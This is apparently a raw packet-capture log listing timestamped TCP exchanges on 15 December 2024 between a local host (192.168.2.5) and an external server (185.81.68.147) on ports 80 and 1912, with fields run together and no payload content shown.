                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.850671053 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.850775003 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.850825071 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.853319883 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.853372097 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.853498936 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.855911970 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.856281042 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.856337070 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.858587027 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.858701944 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.858777046 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.861247063 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.861294031 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.861351013 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.863856077 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.863981009 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.864034891 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.866579056 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.866611004 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.866672039 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.869118929 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.869225979 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.869477034 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.871963024 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.871995926 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.872101068 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.874423981 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.874479055 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.874686956 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.877219915 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.877233028 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.877305984 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.879678011 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.879780054 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.879829884 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.882453918 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.882466078 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.882510900 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.884965897 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.885039091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.885318041 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.887604952 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.887764931 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.887805939 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.890253067 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.930589914 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.944232941 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.944247961 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.944314957 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.945101976 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.945269108 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.945333004 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.947001934 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.947014093 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.947062016 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.948951006 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.948990107 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.949069023 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.950771093 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.950889111 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.951469898 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.952795982 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.952841997 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.952995062 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.955126047 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.955137014 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.955188036 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.956688881 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.956741095 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.956805944 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.958583117 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.958820105 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.958973885 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.960552931 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.960563898 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.960628986 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.962286949 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.962397099 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.962451935 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.964158058 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.964328051 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.964404106 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.965878963 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.965935946 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.965971947 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.999245882 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.051898003 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.085875034 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.115181923 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.235150099 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.235234022 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.235296965 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.355108023 CET8049727185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:23.355178118 CET4972780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524285078 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524286032 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524318933 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524374008 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524389029 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524419069 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524446964 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524477005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.524696112 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.589514971 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.592951059 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644047022 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644196987 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644278049 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644311905 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644344091 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644375086 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644402981 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644403934 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644507885 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644531965 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644531965 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644536018 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644567966 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644587040 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.644615889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.645147085 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.712934017 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764303923 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764337063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764439106 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764467955 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764483929 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764483929 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764501095 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764528036 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764539957 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764589071 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764641047 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764671087 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764698982 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764719963 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.764795065 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.765949965 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884501934 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884532928 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884587049 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884603024 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884614944 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884637117 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884663105 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884663105 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884692907 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884718895 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884740114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884747028 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884774923 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884803057 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.884813070 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.885103941 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.885715008 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:28.885775089 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004921913 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004968882 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004981995 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.004995108 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005023003 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005037069 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005048037 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005059004 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005074024 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005089998 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005178928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005178928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005587101 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.005661964 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125190973 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125231981 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125266075 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125298023 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125299931 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125329971 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125355005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125356913 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125375032 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125386953 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125411034 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125416040 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125444889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125448942 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125490904 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125500917 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125530958 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125560045 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125565052 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125586987 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.125608921 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847299099 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.847348928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.905262947 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.905309916 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.905756950 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.906791925 CET4974480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966408968 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966485023 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966538906 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966568947 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966597080 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966631889 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966631889 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966758013 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.966861963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967221975 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967250109 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967282057 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967338085 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967401028 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967431068 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967500925 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967533112 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967598915 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967628956 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967696905 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967698097 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.967698097 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:29.968612909 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.026492119 CET8049744185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.039830923 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086536884 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086631060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086673021 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086750984 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086790085 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086829901 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086827993 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086827993 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.086896896 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087177038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087362051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087403059 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087420940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087449074 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087466955 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087507963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087512970 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087590933 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087641954 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087655067 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087696075 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.087744951 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.088370085 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.089499950 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.159601927 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.159836054 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.160307884 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206577063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206645012 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206691027 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206722021 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206773043 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206819057 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206864119 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206872940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206913948 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206926107 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.206980944 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207252979 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207496881 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207537889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207559109 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207582951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207587004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207627058 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207650900 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207693100 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207703114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207741022 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207755089 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207796097 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207802057 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.207843065 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.209327936 CET191249709185.81.68.147192.168.2.5
